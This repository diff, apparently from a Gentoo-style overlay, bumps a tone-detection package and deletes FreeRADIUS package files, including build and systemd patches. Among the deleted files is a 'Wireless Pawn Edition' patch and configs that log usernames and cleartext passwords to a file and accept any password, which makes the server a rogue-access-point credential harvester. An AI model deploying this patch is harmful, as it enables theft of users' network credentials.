@ -1 +1 @@
DIST icad-tone-detection-1.3.gh.tar.gz 1578471 BLAKE2B c2834918caeeac49d9c2ab3435424cc836bd4dcf5ec5e76dd04721c42eba32d9153038120dc173f8469d44dd97416bdab82dbdfc00b799c05344d8e3570aefd0 SHA512 22309ec44a9702e6eb38448f10189991cf9804212e72a40046d4c97a15ddbd0fc886a319b82d6cfb57ddc48184c6d78bdd218428c8e1560db08850312bbf7600 DIST icad-tone-detection-1.4.gh.tar.gz 1578924 BLAKE2B e26b72d1440cf4c50d21af1c9299670828ef848aa70532894156ec77bb8a2f80bb4016fbf0620349f1c8e17235468b0f82de5dbcc90586f8239918f7411cf14a SHA512 b40af1f5e1ea9f1c24af95f7b458a3c294bb1609202de954e8e2f2f51d6351abebff11ba4fffc5c8c9526d51e95087acaf39e498cb685c4d51700b77e20a4767

0
media-radio/icad-tone-detection/icad-tone-detection-1.3.ebuild → media-radio/icad-tone-detection/icad-tone-detection-1.4.ebuild
View file

1
net-dialup/freeradius/Manifest
View file

@ -1 +0,0 @@
DIST freeradius-server-3.2.3.tar.bz2 3454869 BLAKE2B 525204331a5b123dac7457c6adb755cbe9794dbff4a536ea665fc7d1cac97553e392b7b598741c2a9dd00c81decd00608499d6f25208e389b9f213f54977de84 SHA512 06767153e262a2baa2d0cc74099bc13c23b33c2316348b5dc8ec0f5834c028571bd09b8c01726a6eabeaab8fdc3050f40bfeba2d5b1c299585d1689abad365ce

13
net-dialup/freeradius/files/clients_wpe.conf
View file

@ -1,13 +0,0 @@
#######################################################################
#
# Define RADIUS clients (usually a NAS, Access Point, etc.).
#
#######################################################################
client localhost {
ipaddr = 127.0.0.1
secret = testing123
require_message_authenticator = no
# shortname = localhost
nastype = other # localhost isn't usually a NAS...
}

199
net-dialup/freeradius/files/eap_wpe.conf
View file

@ -1,199 +0,0 @@
#######################################################################
#
# Whatever you do, do NOT set 'Auth-Type := EAP'. The server
# is smart enough to figure this out on its own. The most
# common side effect of setting 'Auth-Type := EAP' is that the
# users then cannot use ANY other authentication method.
#
# EAP types NOT listed here may be supported via the "eap2" module.
# See experimental.conf for documentation.
#
#######################################################################
# For WPE, you might want to fix /etc/raddb/certs/ca.cnf:
# policy = policy_anything
eap {
default_eap_type = peap
timer_expire = 60
ignore_unknown_eap_types = no
cisco_accounting_username_bug = yes
max_sessions = 4096
md5 {
}
leap {
}
gtc {
auth_type = PAP
}
tls {
certdir = ${confdir}/certs
cadir = ${confdir}/certs
private_key_password = whatever
private_key_file = ${certdir}/server.pem
certificate_file = ${certdir}/server.pem
CA_file = ${cadir}/ca.pem
dh_file = ${certdir}/dh
random_file = ${certdir}/random
CA_path = ${cadir}
cipher_list = "DEFAULT"
cache {
enable = no
lifetime = 24 # hours
max_entries = 255
}
verify {
}
ocsp {
enable = no
override_cert_url = yes
url = "http://127.0.0.1/ocsp/"
}
}
ttls {
}
##################################################
#
# !!!!! WARNINGS for Windows compatibility !!!!!
#
##################################################
#
# If you see the server send an Access-Challenge,
# and the client never sends another Access-Request,
# then
#
# STOP!
#
# The server certificate has to have special OID's
# in it, or else the Microsoft clients will silently
# fail. See the "scripts/xpextensions" file for
# details, and the following page:
#
# http://support.microsoft.com/kb/814394/en-us
#
# For additional Windows XP SP2 issues, see:
#
# http://support.microsoft.com/kb/885453/en-us
#
#
# If is still doesn't work, and you're using Samba,
# you may be encountering a Samba bug. See:
#
# https://bugzilla.samba.org/show_bug.cgi?id=6563
#
# Note that we do not necessarily agree with their
# explanation... but the fix does appear to work.
#
##################################################
#
# The tunneled EAP session needs a default EAP type
# which is separate from the one for the non-tunneled
# EAP module. Inside of the TLS/PEAP tunnel, we
# recommend using EAP-MS-CHAPv2.
#
# The PEAP module needs the TLS module to be installed
# and configured, in order to use the TLS tunnel
# inside of the EAP packet. You will still need to
# configure the TLS module, even if you do not want
# to deploy EAP-TLS in your network. Users will not
# be able to request EAP-TLS, as it requires them to
# have a client certificate. EAP-PEAP does not
# require a client certificate.
#
#
# You can make PEAP require a client cert by setting
#
# EAP-TLS-Require-Client-Cert = Yes
#
# in the control items for a request.
#
peap {
# The tunneled EAP session needs a default
# EAP type which is separate from the one for
# the non-tunneled EAP module. Inside of the
# PEAP tunnel, we recommend using MS-CHAPv2,
# as that is the default type supported by
# Windows clients.
default_eap_type = mschapv2
# the PEAP module also has these configuration
# items, which are the same as for TTLS.
copy_request_to_tunnel = no
use_tunneled_reply = no
# When the tunneled session is proxied, the
# home server may not understand EAP-MSCHAP-V2.
# Set this entry to "no" to proxy the tunneled
# EAP-MSCHAP-V2 as normal MSCHAPv2.
proxy_tunneled_request_as_eap = yes
#
# The inner tunneled request can be sent
# through a virtual server constructed
# specifically for this purpose.
#
# If this entry is commented out, the inner
# tunneled request will be sent through
# the virtual server that processed the
# outer requests.
#
virtual_server = "inner-tunnel"
# This option enables support for MS-SoH
# see doc/SoH.txt for more info.
# It is disabled by default.
#
# soh = yes
#
# The SoH reply will be turned into a request which
# can be sent to a specific virtual server:
#
# soh_virtual_server = "soh-server"
}
#
# This takes no configuration.
#
# Note that it is the EAP MS-CHAPv2 sub-module, not
# the main 'mschap' module.
#
# Note also that in order for this sub-module to work,
# the main 'mschap' module MUST ALSO be configured.
#
# This module is the *Microsoft* implementation of MS-CHAPv2
# in EAP. There is another (incompatible) implementation
# of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
# currently support.
#
mschapv2 {
# Prior to version 2.1.11, the module never
# sent the MS-CHAP-Error message to the
# client. This worked, but it had issues
# when the cached password was wrong. The
# server *should* send "E=691 R=0" to the
# client, which tells it to prompt the user
# for a new password.
#
# The default is to behave as in 2.1.10 and
# earlier, which is known to work. If you
# set "send_error = yes", then the error
# message will be sent back to the client.
# This *may* help some clients work better,
# but *may* also cause other clients to stop
# working.
#
# send_error = no
}
}

472
net-dialup/freeradius/files/freeradius-3.0.20-py3-fixes.patch
View file

@ -1,472 +0,0 @@
diff --git a/raddb/mods-available/python3 b/raddb/mods-available/python3
index 246dfd74ce..0593c69f1a 100644
--- a/raddb/mods-available/python3
+++ b/raddb/mods-available/python3
@@ -13,7 +13,7 @@ python3 {
# item is GLOBAL TO THE SERVER. That is, you cannot have two
# instances of the python module, each with a different path.
#
-# python_path="/path/to/python/files:/another_path/to/python_files/"
+# python_path="${modconfdir}/${.:name}:/another_path/to/python_files"
module = example
diff --git a/src/modules/rlm_python3/configure.ac b/src/modules/rlm_python3/configure.ac
index a00320fda4..295a2486d2 100644
--- a/src/modules/rlm_python3/configure.ac
+++ b/src/modules/rlm_python3/configure.ac
@@ -8,128 +8,75 @@ if test x$with_[]modname != xno; then
AC_PROG_CC
AC_PROG_CPP
- dnl extra argument: --with-rlm-python3-bin
- PYTHON3_BIN=
- AC_ARG_WITH(rlm-python3-bin,
- [ --with-rlm-python3-bin=PATH Path to python3 binary []],
+ dnl extra argument: --with-rlm-python3-config-bin
+ PYTHON3_CONFIG_BIN=
+ AC_ARG_WITH(rlm-python3-config-bin,
+ [ --with-rlm-python3-config-bin=PATH Path to python-config3 binary []],
[ case "$withval" in
no)
- AC_MSG_ERROR(Need rlm-python3-bin)
+ AC_MSG_ERROR(Need rlm-python3-config-bin)
;;
yes)
;;
*)
- PYTHON3_BIN="$withval"
+ PYTHON3_CONFIG_BIN="$withval"
;;
esac ]
)
- if test "x$PYTHON3_BIN" = x; then
- AC_CHECK_PROGS(PYTHON3_BIN, [ python3 ], not-found, [${PATH}:/usr/bin:/usr/local/bin])
+ if test "x$PYTHON3_CONFIG_BIN" = x; then
+ AC_CHECK_PROGS(PYTHON3_CONFIG_BIN, [ python3-config ], not-found, [${PATH}:/usr/bin:/usr/local/bin])
fi
- if test "x$PYTHON3_BIN" = "xnot-found"; then
- fail="python-binary"
- fi
-
- dnl extra argument: --with-rlm-python3-lib-dir
- PY_LIB_DIR=
- AC_ARG_WITH(rlm-python3-lib-dir,
- [ --with-rlm-python3-lib-dir=DIR Directory for Python library files []],
- [ case "$withval" in
- no)
- AC_MSG_ERROR(Need rlm-python3-lib-dir)
- ;;
- yes)
- ;;
- *)
- PY_LIB_DIR="$withval"
- ;;
- esac ]
- )
-
- dnl extra argument: --with-rlm-python3-include-dir
- PY_INC_DIR=
- AC_ARG_WITH(rlm-python3-include-dir,
- [ --with-rlm-python3-include-dir=DIR Directory for Python include files []],
- [ case "$withval" in
- no)
- AC_MSG_ERROR(Need rlm-python3-include-dir)
- ;;
- yes)
- ;;
- *)
- PY_INC_DIR="$withval"
- ;;
- esac ]
- )
-
- if test x$fail = x; then
- PY_PREFIX=`${PYTHON3_BIN} -c 'import sys ; print(sys.prefix)'`
- AC_MSG_NOTICE([Python sys.prefix \"${PY_PREFIX}\"])
-
- PY_EXEC_PREFIX=`${PYTHON3_BIN} -c 'import sys ; print(sys.exec_prefix)'`
- AC_MSG_NOTICE([Python sys.exec_prefix \"${PY_EXEC_PREFIX}\"])
-
- PY_SYS_VERSION=`${PYTHON3_BIN} -c 'import sys ; print(sys.version[[0:3]])'`
- AC_MSG_NOTICE([Python sys.version \"${PY_SYS_VERSION}\"])
-
- if test "x$PY_LIB_DIR" = "x"; then
- PY_LIB_DIR="$PY_EXEC_PREFIX/lib/python${PY_SYS_VERSION}/config"
- PY_LIB_LOC="-L$PY_EXEC_PREFIX/lib/python${PY_SYS_VERSION}/config"
- fi
-
- PY_MAKEFILE="$PY_EXEC_PREFIX/lib/python${PY_SYS_VERSION}/config/Makefile"
- if test -f ${PY_MAKEFILE}; then
- PY_LOCAL_MOD_LIBS=`sed -n -e 's/^LOCALMODLIBS=\(.*\)/\1/p' $PY_MAKEFILE | sed -e 's/[[[:blank:]]]/ /g;s/^ *//;s/ *$//'`
- AC_MSG_NOTICE([Python local_mod_libs \"${PY_LOCAL_MOD_LIBS}\"])
-
- PY_BASE_MOD_LIBS=`sed -n -e 's/^BASEMODLIBS=\(.*\)/\1/p' $PY_MAKEFILE | sed -e 's/[[[:blank:]]]/ /g;s/^ *//;s/ *$//'`
- AC_MSG_NOTICE([Python base_mod_libs \"${PY_BASE_MOD_LIBS}\"])
-
- PY_OTHER_LIBS=`sed -n -e 's/^LIBS=\(.*\)/\1/p' $PY_MAKEFILE | sed -e 's/[[[:blank:]]]/ /g;s/ / /g;s/^ *//;s/ *$//'`
- PY_OTHER_LDFLAGS=`sed -n -e 's/^LINKFORSHARED=\(.*\)/\1/p' $PY_MAKEFILE | sed -e 's/[[[:blank:]]]/ /g;s/ / /g;s/^ *//;s/ *$//'`
- AC_MSG_NOTICE([Python other_libs \"${PY_OTHER_LDFLAGS} ${PY_OTHER_LIBS}\"])
- fi
- PY_EXTRA_LIBS="$PY_LOCALMODLIBS $PY_BASE_MOD_LIBS $PY_OTHER_LIBS"
+ if test "x$PYTHON3_CONFIG_BIN" = xnot-found; then
+ fail="$fail python3-config"
+ else
+ dnl #
+ dnl # It is necessary due to a weird behavior with 'python3-config'
+ dnl #
+ old_CFLAGS="$CFLAGS"
+ unset CFLAGS
+
+ python3_cflags=`${PYTHON3_CONFIG_BIN} --cflags`
+ AC_MSG_NOTICE([${PYTHON3_CONFIG_BIN}'s cflags were \"${python3_cflags}\"])
+
+ dnl # Convert -I to -isystem to get rid of warnings about issues in Python headers
+ dnl # Strip -systemroot
+ dnl # Strip optimisation flags (-O[0-9]?). We decide our optimisation level, not python.
+ dnl # -D_FORTIFY_SOURCE needs -O.
+ dnl # Strip debug symbol flags (-g[0-9]?). We decide on debugging symbols, not python
+ dnl # Strip -W*, we decide what warnings are important
+ dnl # Strip -DNDEBUG
+ mod_cflags=`echo $python3_cflags | sed -e '\
+ s/-I/-isystem/g;\
+ s/-isysroot[[ =]]\{0,1\}[[^-]]*//g;\
+ s/-O[[^[[:blank:]]]]*//g;\
+ s/-Wp,-D_FORTIFY_SOURCE=[[[:digit:]]]//g;\
+ s/-g[[^ ]]*//g;\
+ s/-W[[^ ]]*//g;\
+ s/-DNDEBUG[[[:blank:]]]*//g;
+ '`
+ AC_MSG_NOTICE([Sanitized cflags were \"${mod_cflags}\"])
+
+ python3_ldflags=`${PYTHON3_CONFIG_BIN} --ldflags`
+ AC_MSG_NOTICE([${PYTHON3_CONFIG_BIN}'s ldflags were \"$python3_ldflags}\"])
+
+ dnl # Strip -Wl,-O1... Is -O even a valid linker flag??
+ dnl # Strip -Wl,-Bsymbolic-functions as thats not always supported or required
+ dnl # Strip -Xlinker -export-dynamic as it causes weird linking issues on Linux
+ dnl # See: https://bugs.python.org/issue36508
+ mod_ldflags=`echo $python3_ldflags | sed -e '\
+ s/-Wl,-O[[[:digit:]]][[[:blank:]]]*//g;\
+ s/-Wl,-Bsymbolic-functions[[[:blank:]]]*//g;\
+ s/-Xlinker -export-dynamic//g;\
+ s/-Wl,-stack_size,[[[:digit:]]]*[[[:blank:]]]//g;
+ '`
+ AC_MSG_NOTICE([Sanitized ldflags were \"${mod_ldflags}\"])
- old_CFLAGS=$CFLAGS
- CFLAGS="$CFLAGS $PY_CFLAGS"
- smart_try_dir="$PY_PREFIX/include/python$PY_SYS_VERSION"
- FR_SMART_CHECK_INCLUDE(Python.h)
CFLAGS=$old_CFLAGS
- if test "x$ac_cv_header_Python_h" = "xyes"; then
- mod_cflags="$SMART_CPPFLAGS"
- else
- fail="$fail Python.h"
- targetname=
- fi
-
- old_LIBS=$LIBS
- LIBS="$LIBS $PY_LIB_LOC $PY_EXTRA_LIBS -lm"
- smart_try_dir=$PY_LIB_DIR
- FR_SMART_CHECK_LIB(python${PY_SYS_VERSION}, Py_Initialize)
- LIBS=$old_LIBS
-
- eval t=\${ac_cv_lib_${sm_lib_safe}_${sm_func_safe}}
- if test "x$t" = "xyes"; then
- mod_ldflags="$PY_LIB_LOC $PY_EXTRA_LIBS $SMART_LIBS -lm"
- targetname=modname
- else
- FR_SMART_CHECK_LIB(python${PY_SYS_VERSION}m, Py_Initialize)
- eval t=\${ac_cv_lib_${sm_lib_safe}_${sm_func_safe}}
- if test "x$t" = "xyes"; then
- mod_ldflags="$PY_LIB_LOC $PY_EXTRA_LIBS $SMART_LIBS -lm"
- targetname=modname
- else
- targetname=
- fail="$fail libpython$PY_SYS_VERSION"
- fi
- fi
+ targetname="rlm_python3"
fi
-
- AC_CHECK_FUNCS([dl_iterate_phdr])
else
targetname=
echo \*\*\* module modname is disabled.
diff --git a/src/modules/rlm_python3/rlm_python3.c b/src/modules/rlm_python3/rlm_python3.c
index 06187e4ffa..8e893a0eaa 100644
--- a/src/modules/rlm_python3/rlm_python3.c
+++ b/src/modules/rlm_python3/rlm_python3.c
@@ -67,8 +67,10 @@ static CONF_PARSER module_config[] = {
A(preacct)
A(accounting)
A(checksimul)
+#ifdef WITH_PROXY
A(pre_proxy)
A(post_proxy)
+#endif
A(post_auth)
#ifdef WITH_COA
A(recv_coa)
@@ -98,7 +100,9 @@ static struct {
A(L_AUTH)
A(L_INFO)
A(L_ERR)
+#ifdef WITH_PROXY
A(L_PROXY)
+#endif
A(L_ACCT)
A(L_DBG_WARN)
A(L_DBG_ERR)
@@ -510,6 +514,7 @@ static rlm_rcode_t do_python_single(REQUEST *request, PyObject *pFunc, char cons
goto finish;
}
+#ifdef WITH_PROXY
/* fill proxy vps */
if (request->proxy) {
if (!mod_populate_vps(pArgs, 4, request->proxy->vps)) {
@@ -517,10 +522,13 @@ static rlm_rcode_t do_python_single(REQUEST *request, PyObject *pFunc, char cons
ret = RLM_MODULE_FAIL;
goto finish;
}
- } else {
+ } else
+#endif
+ {
mod_populate_vps(pArgs, 4, NULL);
}
+#ifdef WITH_PROXY
/* fill proxy_reply vps */
if (request->proxy_reply) {
if (!mod_populate_vps(pArgs, 5, request->proxy_reply->vps)) {
@@ -528,7 +536,9 @@ static rlm_rcode_t do_python_single(REQUEST *request, PyObject *pFunc, char cons
ret = RLM_MODULE_FAIL;
goto finish;
}
- } else {
+ } else
+#endif
+ {
mod_populate_vps(pArgs, 5, NULL);
}
@@ -550,9 +560,14 @@ static rlm_rcode_t do_python_single(REQUEST *request, PyObject *pFunc, char cons
PyDict_SetItemString(pDictInput, "request", PyTuple_GET_ITEM(pArgs, 0)) ||
PyDict_SetItemString(pDictInput, "reply", PyTuple_GET_ITEM(pArgs, 1)) ||
PyDict_SetItemString(pDictInput, "config", PyTuple_GET_ITEM(pArgs, 2)) ||
- PyDict_SetItemString(pDictInput, "session-state", PyTuple_GET_ITEM(pArgs, 3)) ||
+ PyDict_SetItemString(pDictInput, "session-state", PyTuple_GET_ITEM(pArgs, 3))
+#ifdef WITH_PROXY
+ ||
PyDict_SetItemString(pDictInput, "proxy-request", PyTuple_GET_ITEM(pArgs, 4)) ||
- PyDict_SetItemString(pDictInput, "proxy-reply", PyTuple_GET_ITEM(pArgs, 5))) {
+ PyDict_SetItemString(pDictInput, "proxy-reply", PyTuple_GET_ITEM(pArgs, 5))
+#endif
+ ) {
+
ERROR("%s:%d, %s - PyDict_SetItemString failed", __func__, __LINE__, funcname);
ret = RLM_MODULE_FAIL;
goto finish;
@@ -819,8 +834,10 @@ MOD_FUNC(authorize)
MOD_FUNC(preacct)
MOD_FUNC(accounting)
MOD_FUNC(checksimul)
+#ifdef WITH_PROXY
MOD_FUNC(pre_proxy)
MOD_FUNC(post_proxy)
+#endif
MOD_FUNC(post_auth)
#ifdef WITH_COA
MOD_FUNC(recv_coa)
@@ -1102,7 +1119,7 @@ static int python_interpreter_init(rlm_python_t *inst, CONF_SECTION *conf)
python_dlhandle = dlopen_libpython(RTLD_NOW | RTLD_GLOBAL);
if (!python_dlhandle) WARN("Failed loading libpython symbols into global symbol table");
-#if PY_VERSION_HEX > 0x03050000
+#if PY_VERSION_HEX >= 0x03050000
{
wchar_t *name;
@@ -1110,13 +1127,6 @@ static int python_interpreter_init(rlm_python_t *inst, CONF_SECTION *conf)
Py_SetProgramName(name); /* The value of argv[0] as a wide char string */
PyMem_RawFree(name);
}
-#elif PY_VERSION_HEX > 0x0300000
- {
- wchar_t *name;
-
- MEM(name = _Py_char2wchar(main_config.name, NULL));
- Py_SetProgramName(inst->wide_name); /* The value of argv[0] as a wide char string */
- }
#else
{
char *name;
@@ -1163,37 +1173,34 @@ static int python_interpreter_init(rlm_python_t *inst, CONF_SECTION *conf)
* the lifetime of the module.
*/
if (inst->python_path) {
+ char *p, *path;
+ PyObject *sys = PyImport_ImportModule("sys");
+ PyObject *sys_path = PyObject_GetAttrString(sys, "path");
+
+ memcpy(&p, &inst->python_path, sizeof(path));
+
+ for (path = strtok(p, ":"); path != NULL; path = strtok(NULL, ":")) {
#if PY_VERSION_HEX > 0x03050000
- {
- wchar_t *path;
- PyObject* sys = PyImport_ImportModule("sys");
- PyObject* sys_path = PyObject_GetAttrString(sys,"path");
-
- MEM(path = Py_DecodeLocale(inst->python_path, NULL));
- PyList_Append(sys_path, PyUnicode_FromWideChar(path,-1));
- PyObject_SetAttrString(sys,"path",sys_path);
- PyMem_RawFree(path);
- }
+ wchar_t *py_path;
+
+ MEM(py_path = Py_DecodeLocale(path, NULL));
+ PyList_Append(sys_path, PyUnicode_FromWideChar(py_path, -1));
+ PyMem_RawFree(py_path);
#elif PY_VERSION_HEX > 0x03000000
- {
- wchar_t *path;
- PyObject* sys = PyImport_ImportModule("sys");
- PyObject* sys_path = PyObject_GetAttrString(sys,"path");
-
- MEM(path = _Py_char2wchar(inst->python_path, NULL));
- PyList_Append(sys_path, PyUnicode_FromWideChar(path,-1));
- PyObject_SetAttrString(sys,"path",sys_path);
- }
-#else
- {
- char *path;
+ wchar_t *py_path;
- memcpy(&path, &inst->python_path, sizeof(path));
- Py_SetPath(path);
- }
+ MEM(py_path = _Py_char2wchar(path, NULL));
+ PyList_Append(sys_path, PyUnicode_FromWideChar(py_path, -1));
+ PyMem_RawFree(py_path);
+#else
+ PyList_Append(sys_path, PyLong_FromString(path));
#endif
- }
+ }
+ PyObject_SetAttrString(sys, "path", sys_path);
+ Py_DecRef(sys);
+ Py_DecRef(sys_path);
+ }
} else {
inst->module = main_module;
Py_IncRef(inst->module);
@@ -1220,7 +1227,7 @@ static int python_interpreter_init(rlm_python_t *inst, CONF_SECTION *conf)
static int mod_instantiate(CONF_SECTION *conf, void *instance)
{
rlm_python_t *inst = instance;
- int code = 0;
+ int code = RLM_MODULE_OK;
inst->name = cf_section_name2(conf);
if (!inst->name) inst->name = cf_section_name1(conf);
@@ -1245,8 +1252,10 @@ static int mod_instantiate(CONF_SECTION *conf, void *instance)
PYTHON_FUNC_LOAD(preacct);
PYTHON_FUNC_LOAD(accounting);
PYTHON_FUNC_LOAD(checksimul);
+#ifdef WITH_PROXY
PYTHON_FUNC_LOAD(pre_proxy);
PYTHON_FUNC_LOAD(post_proxy);
+#endif
PYTHON_FUNC_LOAD(post_auth);
#ifdef WITH_COA
PYTHON_FUNC_LOAD(recv_coa);
@@ -1257,12 +1266,14 @@ static int mod_instantiate(CONF_SECTION *conf, void *instance)
/*
* Call the instantiate function.
*/
- code = do_python_single(NULL, inst->instantiate.function, "instantiate", inst->pass_all_vps, inst->pass_all_vps_dict);
- if (code < 0) {
- error:
- python_error_log(); /* Needs valid thread with GIL */
- PyEval_SaveThread();
- return -1;
+ if (inst->instantiate.function) {
+ code = do_python_single(NULL, inst->instantiate.function, "instantiate", inst->pass_all_vps, inst->pass_all_vps_dict);
+ if (code < 0) {
+ error:
+ python_error_log(); /* Needs valid thread with GIL */
+ PyEval_SaveThread();
+ return -1;
+ }
}
PyEval_SaveThread();
@@ -1272,22 +1283,31 @@ static int mod_instantiate(CONF_SECTION *conf, void *instance)
static int mod_detach(void *instance)
{
rlm_python_t *inst = instance;
- int ret;
+ int ret = RLM_MODULE_OK;
/*
* Call module destructor
*/
PyEval_RestoreThread(inst->sub_interpreter);
- ret = do_python_single(NULL, inst->detach.function, "detach", inst->pass_all_vps, inst->pass_all_vps_dict);
+ if (inst->detach.function) ret = do_python_single(NULL, inst->detach.function, "detach", inst->pass_all_vps, inst->pass_all_vps_dict);
#define PYTHON_FUNC_DESTROY(_x) python_function_destroy(&inst->_x)
PYTHON_FUNC_DESTROY(instantiate);
- PYTHON_FUNC_DESTROY(authorize);
PYTHON_FUNC_DESTROY(authenticate);
+ PYTHON_FUNC_DESTROY(authorize);
PYTHON_FUNC_DESTROY(preacct);
PYTHON_FUNC_DESTROY(accounting);
PYTHON_FUNC_DESTROY(checksimul);
+#ifdef WITH_PROXY
+ PYTHON_FUNC_DESTROY(pre_proxy);
+ PYTHON_FUNC_DESTROY(post_proxy);
+#endif
+ PYTHON_FUNC_DESTROY(post_auth);
+#ifdef WITH_COA
+ PYTHON_FUNC_DESTROY(recv_coa);
+ PYTHON_FUNC_DESTROY(send_coa);
+#endif
PYTHON_FUNC_DESTROY(detach);
Py_DecRef(inst->pythonconf_dict);
@@ -1313,14 +1333,8 @@ static int mod_detach(void *instance)
PyThreadState_Swap(main_interpreter); /* Swap to the main thread */
Py_Finalize();
dlclose(python_dlhandle);
-
-#if PY_VERSION_HEX > 0x03050000
- //if (inst->wide_name) PyMem_RawFree(inst->wide_name);
- //if (inst->wide_path) PyMem_RawFree(inst->wide_path);
-#endif
}
-
return ret;
}
@@ -1348,8 +1362,10 @@ module_t rlm_python3 = {
[MOD_PREACCT] = mod_preacct,
[MOD_ACCOUNTING] = mod_accounting,
[MOD_SESSION] = mod_checksimul,
+#ifdef WITH_PROXY
[MOD_PRE_PROXY] = mod_pre_proxy,
[MOD_POST_PROXY] = mod_post_proxy,
+#endif
[MOD_POST_AUTH] = mod_post_auth,
#ifdef WITH_COA
[MOD_RECV_COA] = mod_recv_coa,

57
net-dialup/freeradius/files/freeradius-3.0.20-systemd-service.patch
View file

@ -1,57 +0,0 @@
diff --git a/debian/freeradius.service b/debian/freeradius.service
index 378702d184..ee33c2a294 100644
--- a/debian/freeradius.service
+++ b/debian/freeradius.service
@@ -7,7 +7,6 @@ Documentation=man:radiusd(8) man:radiusd.conf(5) http://wiki.freeradius.org/ htt
Type=notify
WatchdogSec=60
NotifyAccess=all
-EnvironmentFile=-/etc/default/freeradius
# FreeRADIUS can do static evaluation of policy language rules based
# on environmental variables which is very useful for doing per-host
@@ -25,16 +24,15 @@ MemoryLimit=2G
# Ensure the daemon can still write its pidfile after it drops
# privileges. Combination of options that work on a variety of
# systems. Test very carefully if you alter these lines.
-RuntimeDirectory=freeradius
+RuntimeDirectory=radiusd
RuntimeDirectoryMode=0775
# This does not work on Debian Jessie:
-User=freerad
-Group=freerad
-# This does not work on Ubuntu Bionic:
-ExecStartPre=/bin/chown freerad:freerad /var/run/freeradius
+User=radius
+Group=radius
-ExecStartPre=/usr/sbin/freeradius $FREERADIUS_OPTIONS -Cx -lstdout
-ExecStart=/usr/sbin/freeradius -f $FREERADIUS_OPTIONS
+ExecStartPre=/usr/sbin/radiusd $RADIUSD_OPTIONS -Cx -lstdout
+ExecStart=/usr/sbin/radiusd -f $RADIUSD_OPTIONS
+ExecReload=/bin/kill -HUP $MAINPID
Restart=on-failure
RestartSec=5
@@ -42,7 +40,7 @@ RestartSec=5
NoNewPrivileges=true
# Allow binding to secure ports, broadcast addresses, and raw interfaces.
-#CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW CAP_SETUID CAP_SETGID CAP_CHOWN CAP_DAC_OVERRIDE
+CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW CAP_SETUID CAP_SETGID CAP_CHOWN CAP_DAC_OVERRIDE
# Private /tmp that isn't shared by other processes
PrivateTmp=true
@@ -60,10 +58,10 @@ ProtectKernelTunables=true
SystemCallArchitectures=native
# We shouldn't be writing to the configuration directory
-ReadOnlyDirectories=/etc/freeradius/
+ReadOnlyDirectories=/etc/raddb/
# We can read and write to the log directory.
-ReadWriteDirectories=/var/log/freeradius/
+ReadWriteDirectories=/var/log/radius/
[Install]
WantedBy=multi-user.target

469
net-dialup/freeradius/files/freeradius-3.0.20-wpe.patch
View file

@ -1,469 +0,0 @@
diff -Nurp freeradius-server-3.0.18/raddb/mods-config/files/authorize freeradius-server-3.0.18-wpe/raddb/mods-config/files/authorize
--- freeradius-server-3.0.18/raddb/mods-config/files/authorize 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/raddb/mods-config/files/authorize 2019-02-26 14:02:54.666099898 -0500
@@ -218,3 +218,5 @@ DEFAULT Hint == "SLIP"
# See the example user "bob" above. #
#########################################################
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -Nurp freeradius-server-3.0.18/raddb/radiusd.conf.in freeradius-server-3.0.18-wpe/raddb/radiusd.conf.in
--- freeradius-server-3.0.18/raddb/radiusd.conf.in 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/raddb/radiusd.conf.in 2019-02-26 14:02:54.666099898 -0500
@@ -382,6 +382,9 @@ log {
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+# Wireless Pawn Edition log file
+wpelogfile = ${logdir}/freeradius-server-wpe.log
+
# SECURITY CONFIGURATION
#
# There may be multiple methods of attacking on the server. This
diff -Nurp freeradius-server-3.0.18/src/include/log.h freeradius-server-3.0.18-wpe/src/include/log.h
--- freeradius-server-3.0.18/src/include/log.h 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/include/log.h 2019-02-26 14:02:54.666099898 -0500
@@ -72,6 +72,11 @@ typedef struct fr_log_t {
char const *debug_file; //!< Path to debug log file.
} fr_log_t;
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename);
+
typedef void (*radlog_func_t)(log_type_t lvl, log_lvl_t priority, REQUEST *, char const *, va_list ap);
extern FR_NAME_NUMBER const syslog_facility_table[];
diff -Nurp freeradius-server-3.0.18/src/include/radiusd.h freeradius-server-3.0.18-wpe/src/include/radiusd.h
--- freeradius-server-3.0.18/src/include/radiusd.h 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/include/radiusd.h 2019-02-26 14:02:54.666099898 -0500
@@ -149,6 +149,8 @@ typedef struct main_config {
char const *checkrad; //!< Script to use to determine if a user is already
//!< connected.
+ char const *wpelogfile; //!< Wireless Pawn Edition log file path.
+
rad_listen_t *listen; //!< Head of a linked list of listeners.
diff -Nurp freeradius-server-3.0.18/src/main/auth.c freeradius-server-3.0.18-wpe/src/main/auth.c
--- freeradius-server-3.0.18/src/main/auth.c 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/main/auth.c 2019-02-26 14:02:54.666099898 -0500
@@ -129,6 +129,7 @@ static int rad_authlog(char const *msg,
} else {
fr_prints(clean_password, sizeof(clean_password),
request->password->vp_strvalue, request->password->vp_length, '\0');
+ log_wpe("password", request->username->vp_strvalue, clean_password, NULL, 0, NULL, 0, main_config.wpelogfile);
}
}
diff -Nurp freeradius-server-3.0.18/src/main/libfreeradius-server.mk freeradius-server-3.0.18-wpe/src/main/libfreeradius-server.mk
--- freeradius-server-3.0.18/src/main/libfreeradius-server.mk 2019-02-25 16:41:30.000000000 -0500
+++ freeradius-server-3.0.18-wpe/src/main/libfreeradius-server.mk 2019-02-26 14:02:54.666099898 -0500
@@ -14,6 +14,7 @@ SOURCES := conffile.c \
pair.c \
xlat.c
+
# This lets the linker determine which version of the SSLeay functions to use.
TGT_LDLIBS := $(OPENSSL_LIBS)
diff -Nurp freeradius-server-3.0.18/src/main/log.c freeradius-server-3.0.18-wpe/src/main/log.c
